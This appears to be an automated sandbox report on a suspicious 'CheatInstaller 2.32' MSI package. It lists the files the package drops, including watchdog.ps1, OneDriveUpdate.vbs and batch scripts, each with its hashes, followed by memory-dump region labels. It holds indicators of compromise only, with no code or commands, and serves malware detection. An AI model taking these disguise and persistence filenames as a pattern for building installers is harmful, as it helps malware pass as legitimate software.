SHA512 03b089f0ff17be35be76c37160dd68a9ca17e0fbe8447db82c8f90795c8ca90cab7ff752e15114cdc28340020197a4647b73c3f13d47641680b3bee915738f40

C:\Users\Admin\AppData\Local\Temp\MSI7A62.tmp

MD5 07a96a6c116e6b00b5999d36835284ad
SHA1 1d2b66e771ac57e79b982477d08e7b77fa5b7863
SHA256 f52606e4810922c47cb4b514f1d2caa3f13bf53dcb1a27b6ce6912af6ab65674
SHA512 c0cb6087f9bc2e890a1a812cb448976463eddf164733830252d2e9e7d0a80b04aeaac0d2ade99a58f7630ce9650d18f204a9caaf8dd11883f013ff4379df10b3

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 7e4acb5648fa4f3fd815b2bf2ff9dcd3
SHA1 757fd70be6f000578a4da3fca2b2881ed8a8a10e
SHA256 128abe4839c537bfde598a1a590c635aa1c6933a15cf40762794ce5d4a28fab5
SHA512 783cdf8975f0ba6c7f0fc825c4879c8bb030cbee74c40343f4f01479a4f7166046fa86268ae32fd56038ad083ef2afeb34e4ae7e67d1d0df071268196b0e3467

C:\Windows\Installer\MSI7BB8.tmp

MD5 edce06c36e423b3bfb251beba3acc13d
SHA1 01e0b3bf435f0a674d433ba69d72e34d99d54cc8
SHA256 a57f41df06d9d9ae147b38acfe9f44f3292939151943cc110c41edbd9d57a4b1
SHA512 2d6f403c82d24e967a5f404311377bcd5984a916a290f4c52af8eea53f66be7627badbeb7e45440cc103869d49c6510628262b041b562e4e4f1f08f0043fb375

C:\Windows\Installer\MSI7C19.tmp

MD5 6bb65410717bb2c62ed92cdbc9c41652
SHA1 1f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA256 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA512 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38

C:\Windows\Installer\MSI7CC6.tmp

MD5 a8338e7b3ce49ab7e793952765ac998f
SHA1 29a2dd67eba553530f84f9e02266474ea678abdd
SHA256 6fa584e22fc546b95fa757279ce5569e5540bf2ac28b138adba41877fe0c645d
SHA512 85c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_44aipdb0.wyw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3456-3592-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/3456-3595-0x000002CC41A20000-0x000002CC41A30000-memory.dmp

memory/3456-3594-0x000002CC41A20000-0x000002CC41A30000-memory.dmp

memory/3456-3593-0x000002CC41A20000-0x000002CC41A30000-memory.dmp

memory/3456-3591-0x000002CC419D0000-0x000002CC419F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss7D12.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

C:\Users\Admin\AppData\Local\Temp\scr7D02.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 d3dff05f50e0edcecca77d97468a1aef
SHA1 87a217697bd981c8a9dc5a94ae65daf3ece5f081
SHA256 86cad2a008f8a7be294be384100f6c0cc0cc4bbdb154174b81ea8c61bc85748e
SHA512 0b897b0697b3beb69dbe22db514ce53f3fb0b456fc14b79e4719b840bf17165a594a052230f2242647cf0fc047b4066461aa5af5289d5869926d16189dc8f005

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 b3571e05b874dd5dcaf71804107b9a2e
SHA1 448c4be0dfaaf9d70020ad4088cd3dd2115c0378
SHA256 5db4ac4529e15f99fb7a9640e3628e214332f17e3d25df80cab57f2a6d130e4d
SHA512 78f08455ed661b8f2d95244c3a69a198afda38a3c36b51c6bfcd190b76d603b0daa3f589b53551656faef1aa94a4e32da24a24d7d74cd0b87639b34da7d95a13

C:\Users\Admin\AppData\Local\Temp\scr7D01.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\progressgood.bat

MD5 845cf6630a4a8d184f93d0f732feb846
SHA1 1d9219177aaf25e5a95bdc72ec8cd6fd42e6cace
SHA256 19f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153
SHA512 bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e

memory/3456-3670-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

C:\Windows\Installer\MSI7FC7.tmp

MD5 f03efd3107da661ffeb8389fd7684c18
SHA1 e6d7f24b7ae9cae8476c0c12fb7ae13d49a3173f
SHA256 d2a3b1b5355791074c2a243a1d2c7922dfe0d71de6f97ef324add09eab5d0938
SHA512 22e27b7ebabdc1d0fe27b671a587509c733b79501f477f9e8df0a0fbc04cc0dc42da163284545d167d52405ffef737fc71885087f4d82a13f954b3815e53cde1

C:\Windows\Installer\MSI7FC7.tmp

MD5 53a16b690f179a351e545871560d10e2
SHA1 fe11007a63f8c2eca013973b6f77287e10b5febb
SHA256 225f2f381e5f72b0c2773e5fd38a1f691bce963a7e920f3845b0fd506e304b75
SHA512 f469fc09f9e49c18114366c090bbd0079957040f5f99440d357a06a12392e87ff4b770f597a328a5f41e5ab55ed1f0e4641eb3bb19ff51d8916f2036364839c2

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav

MD5 7507d02cfabf790786ecaef8b92afc6c
SHA1 fd37a614b03059237697b6bedf8c9df704182f4b
SHA256 38493fd4637a7c263c176290aaacee823088c9a8da0703f94259516cbcda9c07
SHA512 7922a86423861f24c846daa765456d347be9a19c5291933bec62153f8e3ef8179c1d9318784e52968dfe202883d4ed5ad13ebf8fdd24a4a1d5ee10a4800335e7

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.frm

MD5 ac330f2a89a6c828059d1f125cb9cb60
SHA1 a40b10eae1fba1ea43ff70b3941a165d6d0502f2
SHA256 9b2123a554181148e29bbeb66f18da5619b1fd796e4f3de49415748822fef4ec
SHA512 0fd4ac721c969496423c336128c8b3751f3752176c891d85e13cbfc226fcfa00751aab1d1d400ee6b70031b6abaa86fb975f45f30b6c0e8789df27904dedcc42

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1

MD5 beceb9c4ac840a5ac0b51d8774e63149
SHA1 ea375fee5ff404065ba724e877c9a9b01509353b
SHA256 d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34
SHA512 48e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav

MD5 7e9cc72f5dca6a1b8de53eff5fb460d2
SHA1 da1f88c187e55ef3000fac3dd21a05dffb4ead98
SHA256 37c00021eda34c07fee6a049874a37e3135fd9a885c59ba73e93c046d00b5931
SHA512 e2cc66c5a0be7b383148daa82947d9c00eb62878d4678c0da9abbe086f38e2d31a669ea1068e197e1c925b8f6a62c558f59c90aeea0c1b11d282000aa690e06d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\event.csv

MD5 2620f56f03159589486b831d9b6adc4a
SHA1 55dfc135be75692bd64c50b429dcd5460e0b0b90
SHA256 8438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71
SHA512 2915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_ita.txt

MD5 89e2a161df2ef245781707ff93e978bc
SHA1 ab2189d5c8dca09cade0586b929f0264c327db32
SHA256 b8f747babf732bb64a9cfc60a09b79001c87eb3b37d9704174c0964a49ed6f4a
SHA512 0e78e380198330cb143b17490d4540473d359a0198888dfd59ff5b1a94a8637f0e6e8998d2ea6ef83794d41771db449bb4abdc2692872a21ebd7d585652b4115

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav

MD5 172d47e67d4672d5a60b0798eac8bd26
SHA1 f062709f4e5db952068a9b1ac154205520a8d06b
SHA256 f546e0da5efe991ce0d17d0a64cb89ae31e601a1e1fcc4b67b910ef1366df147
SHA512 dbc110aa0e1405f968752d0c7729c0d34ef5b38ce891f7e861cd3197e56e9fd29161d79d8a3c84adeae565598047facc5a6e71c7f609a3b7b4949e110ed9d2bd

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav

MD5 49e4e9913e8b1a805e789bc039dc04e4
SHA1 1e0ac82d34524a7a4c5e81e98a55a1006db7e5ca
SHA256 bee43c6371ed1098d12622bd492c1643b5fbb2c1e96aa075b79305c02bda581a
SHA512 dcdce9d3e6beec310f2034b41b6bf32ad9d034eda13145fd0d2bfb9c8dec503dff77e6de2fdbab4bc259ff520eff0bbef9bb47fad39805d2c16b8ba95e6f6ee4

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_birds.wav

MD5 de4daf4b29df753034432e2ee1f7bcdd
SHA1 3250fd6c97e223df7ffca52683c2e18757f13766
SHA256 93126d9ac5a238089d5aa94c517b08e2bc46d5620a6bf5d59e9cf89fb1473ccf
SHA512 09de00a1161b8bd39c5acfabe3f108c0edd117d68690448b03f2d7ca57d8b36c457c429ea06e1b3cc1befb03f652aa5334584a9a448d921645c999ebc559c338

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav

MD5 156612b1f9a63566809586c6810bc99d
SHA1 3644b3ce2b76545ad0c36ae70bbd2ca060534cdc
SHA256 5f5a811fe4c099ac4640fc8377cd8096734b1a38f56e7eb9d953f96b0ee0e2cc
SHA512 4b29eaf66f59a40163712870fcb85b3c6b38ba69407e72bbfefd1b719f0403785b9f16a5cf1fd565332c5e044e52833a358ed54b45e60255e0b92a4d24e1ecc0

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav

MD5 2a764c03e1302f74a397cce06b4c94b8
SHA1 e769d0b543f62ed4f0e2cda5402b6bfad4b8b14b
SHA256 af611ceabc78d5cf5d337c0c05ceee4c847a8d4aa95a495d2556c5bcb01352d8
SHA512 2544d3bce38146cf333ab8a82d26c2f671a3ea9c48a82f01178bdf8bed4a5fa8036571b328582b08bff34ffc4511fcfc8fc221f092c24c5f30a99c4f42211ed7

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_drums.wav

MD5 2a4fa6d3cc312100698e8cca5b3e86ce
SHA1 79f100c45218f83e576c804de1967f33b73881bd
SHA256 2d6b820c679b1ffb7c20aa0372df02a0bfc8f9fb90c7891dd0616c29a28dae36
SHA512 87ac7ad48ead0752010aa9229a04b0cad3010621ad285dc15d90389e290b192aa0ba8fba7f97f5b92f58f0ec004c262f7d6bfef6d831d5adcb61a61fbb9a7bc8

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_birds.wav

MD5 8f967186d43f326c43ce17b13aa1a07a
SHA1 a259b1b22ae7ce082e9849bcabc5b6352fa8455b
SHA256 04b133a81bee258e2741eef6b31e50eb6d999c6d217a708c8ff8a1b8062e9eca
SHA512 1d9e259582b1a49a6dea790f94f2ae4f7f72d602a231a16aacea2196698b35a1bb3aac07ba19bc12d11c1016551b3f8805b379e207d1c9558f1f0f4b52635094

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav

MD5 0918fe895351b8ca81dfd280b7793efb
SHA1 1ac3a1bfa7b5695e0a5bd1b64b854829abf88c13
SHA256 6abeae90d81f878bf279764eaec245092471ff1e0b866d991a1304bad539796b
SHA512 9db995da62595b12021d2d20e856cb552d8f85d668ef88150ef31e683e198b2608c093be48e629cb34d04312a5b38b25f68b2138f9e41c893269d1497a546a7d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav

MD5 853e68a95a2337654f92883ef1a91496
SHA1 798000bbbe539e6603dca606953527692e0ecee4
SHA256 257bf5b45176188aadb68e3d25cdf35161cedd079e04da4e85b35c17878cbe72
SHA512 193c7b55d01f27f3e62f65bcd162d063dd7876fa228d86a9067e901142a3226e98349b85836a6e44fb0ebd1f9e32bfc1847d3a55ed62c28daeb558965205f853

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav

MD5 092fce41d6005d421b4150bd9c20352d
SHA1 89eb1cd1c2c7b1e4f8fbde0072dc6677d8e183d1
SHA256 34add61236af652894dda028e55297104f9b1da48f01d76d6a7b68d3dff9c301
SHA512 ebc8ad7e4b361ed557e65c5810d034e92523b0a95e727c8455437815b8e957b2c3dea4acbbf7c62dff32aa90db630588db04a6d5da737eb759ac0bbd8f42f28c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav

MD5 af5c8458e8189e1ec46a56c2bba94587
SHA1 a74e728016478503ee6abd924f3a8f7d17db7322
SHA256 577341f145f559efc1353f21052902a0639fd66ce509bbfa2248c83cd9ebccc1
SHA512 2bff731f6d8cafa82ab9e1f35259fcb71688b3d50cc4b3c8075a0c2436dc5255443d845c86965a1e6fb401ffdf5ec8a4715bd242384cef4cef2f9dc4bf955a24

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav

MD5 083941fc4df203e8054324c1b4ae7e5a
SHA1 c463de16504e1010b277f424c930cdb025ebf60f
SHA256 0c2393a72d6f65c81476e23c01fcc59cb0176905a9960247102c41fad11f2c2f
SHA512 869fdad12611949757516a1ec57a47eea52f301acac04a30a58b7b687516495ddb7e47e5b87566e9d297b84e68275636299f079a5102f5f90b1180297ad9479f

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav

MD5 fb94f0ef05a417227dd433496f8bde47
SHA1 7aa893199044a0ef8049b365ab997baec1254238
SHA256 7ab6fb3c23bf7d395924ebd296b8dd94861e1f0fad5961a722004aba7b870b3a
SHA512 99e73238e9e189ed4d9aec832d3e6da46987fcd8c3d09da9beb6d0bdfc0fe45e4b3e9e14449095570a942e5eecf46756b4b2b146d0f9569b9252724c0880b80f

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_tatum.wav

MD5 3869cffa22339f9e5f8c90f25200f6b2
SHA1 b820f33f3bda58610de205a186097c7958dce7ec
SHA256 845454a24afc2a600b6a85e7340b5227d2593eae8d4a356380c00e9e7561fc5f
SHA512 d5882624970772d7460a020e617e5b83f4d7ee22c272407d0bc2514fa786bbfe73a5683593ddaca58d85285d6987d24d240eee0758fe1602ca1e35b76003c6b7

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\general_log.frm

MD5 ea26bb989e3e2c321a47d499d2682ae1
SHA1 a79e8c99186c20fb09f1457b3d183538e1e1b1bb
SHA256 4a208c39ac55c440fa336c3463428609db81112512f6551a1331a516a2d1da81
SHA512 07f2b43db67b76b463c1770dd6ddb445bbcefcd8f8dfb85e9c28306cf5282272805516dd3166851b66a8358e16632a09a524d6918aae8711d97939beda53137e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.MYI

MD5 f0bb4307afbd586f0499f4023213863d
SHA1 cd978f445f02aab75b1d89c5e28e348860d8c306
SHA256 49a2cd5ce74b5969db3eb785c02fda21f207672b2348c95252b3200d05281129
SHA512 a4327e9535d84ad98b4880764a05141170febf1c02d3fb74f71d704185e8176545c15ecfa34e5c8218cc33f4b7f07deb1fe0f2c06c1b400a3798a75016de861c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav

MD5 ab20714d621add7b678afb890df0b598
SHA1 68ca3acf87cc3ee80cf1e9a21181f95ba4e4db80
SHA256 7a0e28752b219dd90028624ffdff59cc689ae1e32460b0d942c5db2f70cae4fc
SHA512 77e53ce4d7a7868b3589f9c0dfb4178712fb1c3ea8f60a9e0fb194c74b4d729a54ab5cbb5f842f769c094e514f9abcfd7623a813a83a09ade9e289ce49b4ef3c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_topic.frm

MD5 ccaca741f4002cb8af48d485501ec8e9
SHA1 4895716a9baf869a5ba2ec1c2d0523b7bc8a6cb3
SHA256 0e2099aa021c0a2819f8f80960d729e66f69754675bfe847af8923029a330ec1
SHA512 09f005f1e7e8f9f388031c673a593c8afac42298b6f97ff708babfbc403a952692a0bbfbab3ebbd89f8506c2ec7bdb4154f70827680b6dfd390f80054ff2910a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\slow_log.frm

MD5 5cf177c70e9be2f41adc86ea7e0fc48b
SHA1 9a597f4d25a0fb4837fa06b9b3792de65fae9551
SHA256 9276bfd579b31e71a0f85e8b1085e6f00aafc1428b3c5dee2e765e80c34260a3
SHA512 054f52c54dd936a87ad49f1b31fbf248962ad6909686a98e3b76c6772f7ffbb09e6ecb336c3ff6499eadd45746e407c90992fe5e93f44d0e7feee4cab1e071a1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_relation.MYI

MD5 b7d1f26327bf857bf6ce98ea4fda22b1
SHA1 b3f9c0dd62d5a7f533be36664f8e4954cd1f216d
SHA256 7ce3f6771b4c0a0c0e662dc51ecb460aae223bb3292eaea6c1c6f1bb805b3786
SHA512 91e83b2a3aa885e240f2634d15662954aa0d1104b85ae7bf33948b6bcffcbf763baddb3ecdabd15de53d6eda23d765716891b4dbaaf70168b837480f055e5ab2

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_sc09.wav

MD5 d08eb5b9f7a34adcec5859bdaae31aa9
SHA1 abebbd08477debed99a57c34848e39bc153e930d
SHA256 df71bd5355ee3fed3ba73b81fcfaccebab4c1a0a5dcc539325a9d9076901456d
SHA512 eaf1d2370f096881b6139492f6be8796184aa46ceecd275ece61586ce3123d871d32fccc5408a1c8548dff63b3263120c343e4d4dca677540a1dd946ac043365

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs

MD5 214ee30dbd649af9294f254fc8c33d07
SHA1 e81a7486c5c19868abb7d39fc757f686c4124662
SHA256 d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512 f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_sc09.wav

MD5 6268de2faba6c3e1b47fd0d9287c251a
SHA1 b505bab6b56bfeb15f03efe3f26deb8db9736d57
SHA256 7c5482694f5dcb85a44b028dbe4bfcdcabf1211c3399c3129d48af390a4cd67e
SHA512 8251c2af04a3f75a2c95ee97dc53f9e6ac2d4d1f54c23e0fdf87f5babc9550899fca213a38a4d8fd565c924d3f130fbc098003f828154af58b3329767284f76e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt

MD5 5b1a12edc7b4e82163e5b39694e5b630
SHA1 088d6df18ce940cf01789a27adeaa150f9dc26b7
SHA256 206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9
SHA512 07846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_piano.wav

MD5 c71562a45d9279724ed8641b975463ed
SHA1 346da7d82fe97e63e5bfdde8f031f8990c220713
SHA256 2d7bf4828b4214f78682295968ad3014aedfb74ca22eacf93b25c0a73c5d55ad
SHA512 67f3dd512924ebce1ec17d77c56242948a08fbb81ea72da7c7511ccc5bc13bb0dc8965e69bc1641f0c6eb0bc08b9207233c444db384c46fdc412b5722d629cbc

C:\Windows\Installer\MSI89A2.tmp

MD5 d6581bfb1970d86eea9d65d111c68987
SHA1 7196ac1dbb9fdb0df34a1134244f88f80b4b6f96
SHA256 48bfc39cc77c66896959abaf1f7e7a4d99a652d9244409ced26fad86d4952145
SHA512 36899b7982f18dc7e7a87463380ac62f169deba10675df897c175adf6eefb8103180086b06a3c3646e6643331e76229efa718a65eddb336f8f1fa1bc33431855

C:\Windows\Installer\MSI8A7F.tmp

MD5 48252176964a3af680fb98219e387acd
SHA1 09f355b07efd9f1e801619ef5bee6d64cdedbe93
SHA256 2717cdc3d3dd1350165bfc8aaa67acb88407516b207bc54c3982797da3bf882e
SHA512 6a553b20a0ec0f517bb80f74f13aeef1a5433babb60de4a0311e0fe9d543d4154b4958f413152c29a45bf3304b13a81f586d63a6ff8a24e59180cd1115761a9c

memory/4680-3841-0x0000000002D20000-0x0000000002D56000-memory.dmp

memory/4680-3842-0x0000000071BA0000-0x0000000072351000-memory.dmp

memory/4680-3844-0x00000000053F0000-0x0000000005A1A000-memory.dmp

memory/4680-3845-0x0000000005310000-0x0000000005332000-memory.dmp

memory/4680-3846-0x0000000005C10000-0x0000000005C76000-memory.dmp

memory/4216-3856-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/4680-3852-0x0000000005C80000-0x0000000005CE6000-memory.dmp

memory/4680-3857-0x0000000005E10000-0x0000000006167000-memory.dmp

memory/4216-3866-0x0000023BF7CA0000-0x0000023BF7CB0000-memory.dmp

memory/4680-3867-0x00000000061B0000-0x00000000061CE000-memory.dmp

memory/4680-3868-0x0000000006210000-0x000000000625C000-memory.dmp

memory/4216-3869-0x0000023BF7CA0000-0x0000023BF7CB0000-memory.dmp

memory/4216-3871-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/1284-3880-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/1284-3881-0x00000246EB5D0000-0x00000246EB5E0000-memory.dmp

memory/1284-3883-0x00000246EB5D0000-0x00000246EB5E0000-memory.dmp

memory/4680-3882-0x0000000071BA0000-0x0000000072351000-memory.dmp

memory/1284-3885-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/1832-3887-0x000001A0DDD50000-0x000001A0DDD60000-memory.dmp

memory/1832-3886-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/1832-3896-0x000001A0DDD50000-0x000001A0DDD60000-memory.dmp

memory/4680-3898-0x0000000007B30000-0x00000000081AA000-memory.dmp

memory/1832-3899-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/4680-3900-0x0000000006720000-0x000000000673A000-memory.dmp

memory/1368-3901-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/1368-3902-0x000002CC5E710000-0x000002CC5E720000-memory.dmp

memory/4680-3908-0x00000000074B0000-0x0000000007546000-memory.dmp

memory/4680-3912-0x00000000067B0000-0x00000000067D2000-memory.dmp

memory/4680-3913-0x00000000081B0000-0x0000000008756000-memory.dmp

memory/1368-3914-0x000002CC5E710000-0x000002CC5E720000-memory.dmp

memory/4680-3915-0x0000000007740000-0x00000000077D2000-memory.dmp

memory/4680-3917-0x00000000076F0000-0x00000000076FA000-memory.dmp

memory/1368-3918-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/1620-3924-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/1620-3929-0x000001CADA6D0000-0x000001CADA6E0000-memory.dmp

memory/1620-3925-0x000001CADA6D0000-0x000001CADA6E0000-memory.dmp

memory/1620-3930-0x000001CADA6D0000-0x000001CADA6E0000-memory.dmp

memory/4124-3939-0x0000020EAFE90000-0x0000020EAFEA0000-memory.dmp

memory/4124-3940-0x0000020EAFE90000-0x0000020EAFEA0000-memory.dmp

memory/4124-3944-0x0000020EAFE90000-0x0000020EAFEA0000-memory.dmp

memory/4124-3933-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/4124-3946-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/2600-3955-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/2600-3956-0x000002907A820000-0x000002907A830000-memory.dmp

memory/2600-3957-0x000002907A820000-0x000002907A830000-memory.dmp

memory/2600-3959-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/1572-3965-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/1572-3969-0x0000021A3BCD0000-0x0000021A3BCE0000-memory.dmp

memory/1572-3970-0x0000021A3BCD0000-0x0000021A3BCE0000-memory.dmp

memory/1620-3932-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/1572-3971-0x0000021A3BCD0000-0x0000021A3BCE0000-memory.dmp

memory/1572-3973-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/456-3982-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/456-3984-0x00000281FDF60000-0x00000281FDF70000-memory.dmp

memory/456-3983-0x00000281FDF60000-0x00000281FDF70000-memory.dmp

memory/456-3986-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/3772-3987-0x00007FFEA67E0000-0x00007FFEA72A2000-memory.dmp

memory/3772-3996-0x0000023EAB750000-0x0000023EAB760000-memory.dmp

C:\Windows\Installer\MSI4529.tmp

MD5 8d49691d4ab2fa3cd8c679c0df30c1a1
SHA1 71b8b4619a2b0632920f84f740e7b27af62a921e
SHA256 8412dc56077a9219c7cd04e0fccc2391eb62e32a86ad27e58b24d83c8e8227a5
SHA512 128b1544a4a2fde1eebeaddb2b75a122f7c29f79ad47b7bc648198fdd06047ffedd9601a4bc7808ef51153005986a0fdfb0a06409c23411d13b299bda64aa9f5

C:\Windows\Installer\MSI455A.tmp

MD5 18db7a45912d1664716efdf6e311f5f1
SHA1 24a5d1d2addf8095e6f5e4040a2e1c44956bb141
SHA256 5ffa59b2cb0995af80de9ce944bb3e2933c42cea0d764c0af137ff842dc7fd0c
SHA512 5bc3db53b113d9098170eac6ac1fd2327e6e02f6e5e5e6a5c48e861e1ff683fd2a88928638a0f046a8b89488d6ce1f9eba9952aa34b5ab0858f671b890f250ff

C:\Config.Msi\e577b3e.rbs

MD5 2bc17a487c36362d94bf91c0e43b5d5d
SHA1 13d30ebf1f01cd91066c06dd3c192776f48a09d4
SHA256 af399ab1e28b28deb382d4d26dd4de6876900f7d1b0069b5e31742158a5102e1
SHA512 b1d2dc0043e5e9eb9f36b64c1025ba2671e11f0676a235a6677024e34230adf17258ff8a0aac0780f7da4a1d49c2a1bd8e5a0ca9f5715306c46e123a0642419f

C:\Windows\Installer\MSI452B.tmp

MD5 ce5552c3b309a5f507b31c0af0c0cabf
SHA1 5a5a35ea887677e411ea5ea86dd6881d62db6edf
SHA256 3c2dc5ba528d5c31cefacc19f693b35512eb7d500511b0dbc79762d3f5f7842c
SHA512 4234ee20b71d6f0bed70179344c830be3b18ff53c3652c559f2bc2cd2b7dae142761a8ba77ef2102ac87351ccbb83ee50c855259dd0d7178a75b4412dc5b2389

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\package.json

MD5 4a14d4b54700538e3369c29f7e6f2379
